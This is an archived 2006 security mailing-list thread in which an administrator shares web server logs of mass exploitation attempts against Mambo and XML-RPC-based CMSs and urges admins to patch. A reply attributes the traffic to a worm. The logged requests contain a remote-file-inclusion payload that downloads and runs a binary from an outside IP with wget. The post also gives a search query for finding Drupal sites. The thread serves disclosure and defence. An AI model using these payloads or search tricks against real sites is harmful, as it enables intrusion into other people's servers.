[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060308122455.607670718d008e573ae5b8e56b0222f9.d95bf92dd9.wbe@email.secureserver.net>
Date: Wed, 08 Mar 2006 12:24:55 -0700
From: hchemin@...addy.com
To: Daniel Bonekeeper <thehazard@...il.com>
Cc: vuln@...unia.com, bugs@...uritytracker.com,
full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
news@...uriteam.com
Subject: RE: PHP-based CMS mass-exploitation
This is a mambo based exploit. There are linux based worm variants
which compromise an site running a vulnerable version of Mambo and then
execute a malicious perl script which in turns attempts to exploit
remote sites.
Harry
> -------- Original Message --------
> Subject: [Full-disclosure] PHP-based CMS mass-exploitation
> From: "Daniel Bonekeeper" <thehazard@...il.com>
> Date: Tue, March 07, 2006 8:56 am
> To: bugtraq@...urityfocus.com, bugs@...uritytracker.com,
> news@...uriteam.com, full-disclosure@...ts.grok.org.uk,
> vuln@...unia.com
>
> This is not the first time that we see those kind of "attacks", but on
> the recent days, I've noticed those requests on my webservers with a
> considerable frequency:
>
> 83.84.14X.XXX - - [06/Mar/2006:18:18:12 -0500] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:13 -0500] "GET
> /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP/1.1" 200 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
> NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:14 -0500] "GET
> /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:15 -0500] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:17 -0500] "GET
> /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:18 -0500] "GET
> /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/tmp;wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:19 -0500] "POST /xmlrpc.php
> HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:20 -0500] "POST /blog/xmlrpc.php
> HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:21 -0500] "POST
> /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:22 -0500] "POST
> /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:23 -0500] "POST
> /drupal/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:25 -0500] "POST
> /phpgroupware/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:26 -0500] "POST
> /wordpress/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:27 -0500] "POST /xmlrpc.php
> HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:28 -0500] "POST
> /xmlrpc/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:29 -0500] "POST
> /xmlsrv/xmlrpc.php HTTP/1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
>
>
> All of them, as we can see, are exploitation attempts to known bugged
> pages (like the newest Mambo bug, the old XMLRPC problem with old
> versions of Drupal, etc). I guess that they are getting a list of
> domain names and trying them out with those vulns, and I believe that
> they may already have some thousands of vuln machines in their hands.
> Such attacks might been enhanced by using Google to guess which
> domains are using which CMS... for example, looking on Google for "A
> password and instructions will be sent to this e-mail address, so make
> sure it is accurate." will return a bunch of Drupal websites (88,500
> according to Google, even though we can see just the first 1000 ones).
>
> This is just an advise for all admins that use those CMS, to keep, as
> always, your CMS updated (almost every two weeks there are new vulns
> disclosed), and also, check if you already got caught by that, if
> you're running old software.
>
> --
> # (perl -e "while (1) { print "\x90"; }") | dd of=/dev/evil
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists